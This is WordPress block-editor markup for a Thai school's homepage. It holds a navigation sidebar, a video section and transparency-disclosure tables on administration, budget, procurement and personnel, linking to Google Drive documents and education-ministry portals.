-->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":4,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":46,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/นายอนุศักดิ์-พันธ์งาม-png.png\" alt=\"\" title=\"นายอนุศักดิ์ พันธ์งาม png\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"19_66bc98-69\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns19_66bc98-69\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"19_3d590e-59\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\\u003cbr\\u003eรองผู้อำนวยการโรงเรียน\",\"link\":\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=share_link\",\"sizePreset\":\"small\",\"background\":\"#cf2e2e\",\"backgroundHover\":\"#f78da7\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"19_c72802-2d\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items19_c72802-2d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"19_152c5d-2f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_152c5d-2f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1S1y0Vci8-ZxMUPW_Z_YtqBqTsLG7uCqb/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1S1y0Vci8-ZxMUPW_Z_YtqBqTsLG7uCqb/view?usp=share_link\">ข้อมูลพื้นฐาน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_3cadef-91\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_3cadef-91\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\">ประวัติโรงเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_d4147b-0f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_d4147b-0f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_41d84f-8e\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_41d84f-8e\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\">กรรมการสถานศึกษา</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_17cef9-da\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_17cef9-da\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_a997a3-5a\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_a997a3-5a\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1KNY_0cfvU0tSAr568ZHSWspTl7t86-R6/view?usp=sharing\" data-type=\"page\" data-id=\"19\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_13660f-b9\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_13660f-b9\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=sharing\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_702c0e-e7\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_702c0e-e7\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\">ข้อมูล O-NET</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_0109ca-f6\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_0109ca-f6\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">แบบวัดการรับรู้ EIT 2</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_b4c32e-bd\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_b4c32e-bd\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-200\" style=\"width: 150px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/08/EIT_QRCode-1.png\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/grid {\"uniqueId\":\"b3b3ab6e\",\"columns\":2,\"horizontalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"10b33923\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"1d4269e0\",\"blockVersion\":3,\"typography\":{\"textAlignMobile\":\"center\",\"fontSize\":\"22px\"},\"spacing\":{\"marginBottom\":\"10px\"}} -->\n<h2 class=\"gb-headline gb-headline-1d4269e0 gb-headline-text\"><strong>VTR กิจกรรมโรงเรียน</strong></h2>\n<!-- /wp:generateblocks/headline -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"f57e2371\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"typography\":{\"textAlign\":\"right\",\"textAlignMobile\":\"center\"},\"spacing\":{\"paddingBottomMobile\":\"10px\"}} -->\n<!-- wp:generateblocks/button {\"uniqueId\":\"48e80028\",\"hasUrl\":true,\"blockVersion\":4,\"display\":\"inline-flex\",\"typography\":{\"fontSize\":\"14px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"6px\",\"paddingRight\":\"15px\",\"paddingBottom\":\"6px\",\"paddingLeft\":\"15px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\"} -->\n<a class=\"gb-button gb-button-48e80028 gb-button-text\" href=\"https://www.facebook.com/profile.php?id=61556083436494&amp;sk=videos\"><strong>คลัง VTR  โรงเรียนทั้งหมด</strong></a>\n<!-- /wp:generateblocks/button -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:video {\"id\":64,\"align\":\"center\"} -->\n<figure class=\"wp-block-video aligncenter\"><video controls poster=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/VTR-แนะนำโรงเรียน.png\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/วันครู-1.mp4\"></video></figure>\n<!-- /wp:video --></div>\n<!-- /wp:group -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showThumbnail\":false,\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"3\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"meta-fieldsMargin\":{\"md\":{\"top\":\"-10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"meta-fieldsPadding\":{\"md\":{\"top\":\"-10\",\"bottom\":\"-10\"}},\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":17},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"titlePadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"titleBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"readmoreBgColor\":\"#6096b4\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"paginationMargin\":{\"md\":{\"bottom\":\"-40\",\"top\":\"-20\",\"right\":\"10\",\"left\":\"10\"}}} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"abc6c06d\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"width\":50,\"widthMobile\":100,\"isDynamic\":true,\"blockVersion\":4} /-->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"b0641f20\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"width\":50,\"widthMobile\":100,\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:image {\"id\":260,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/08/O27-1024x576.jpg\" alt=\"\" class=\"wp-image-260\"/></figure>\n<!-- /wp:image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/14sI1pHQ6FFaNHMgoK3-29HJ5-OSuA8MD/view?usp=drive_link\" data-type=\"page\" data-id=\"19\">โครงสร้าง</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\">ข้อมูลผู้บริหาร</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\">อำนาจหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข้อมูลการติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข่าวประชาสัมพันธ์</a></strong></td></tr><tr><td><strong><code><a href=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\" data-type=\"link\" data-id=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\">Q&amp;A</a></code></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</strong></td></tr><tr><td><strong>แผนและความก้าวหน้าในการดำเนินงานและการใช้จ่ายงบประมาณประจำปี</strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1vuZFLIWRkwFNN4GX0n7enJwyg8eDIzBQ/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1vuZFLIWRkwFNN4GX0n7enJwyg8eDIzBQ/view?usp=share_link\">รายงานผลการดำเนินงานประจำปี</a></strong></td></tr><tr><td><strong>คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1ics-Zh-M3PJmB2iudN_y7YVcdRFtVcLi/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1ics-Zh-M3PJmB2iudN_y7YVcdRFtVcLi/view?usp=drive_link\">คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\">ข้อมูลเชิงสถิติการให้บริการ</a></strong></td></tr><tr><td><strong><a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">E-Service</a></strong><br>      -  สถิติการมาเรียน <br>      -  ตรวจสอบผลการเรียน<br>      -  <a href=\"https://www.facebook.com/obec.go.th/?locale=th_TH\">OBEC</a><br>      -  <a href=\"http://contentcenter.obec.go.th/\">OBEC Content Center</a><br>      -  <a href=\"https://a6702.obec.expert/authen/login\" data-type=\"link\" data-id=\"https://a6702.obec.expert/authen/login\">School MIS</a><br>      -  <a href=\"https://portal.bopp-obec.info/obec67\" data-type=\"link\" data-id=\"https://portal.bopp-obec.info/obec67\">ข้อมูลนักเรียนรายบุคคล (DMC)</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</strong></td></tr><tr><td><strong>ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการบริหารและพัฒนาทรัพยากรบุคคล</strong></td></tr><tr><td><strong>รายงานการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</strong></td></tr><tr><td><strong>ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</strong></td></tr><tr><td><strong>การขับเคลื่อนจริยธรรม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 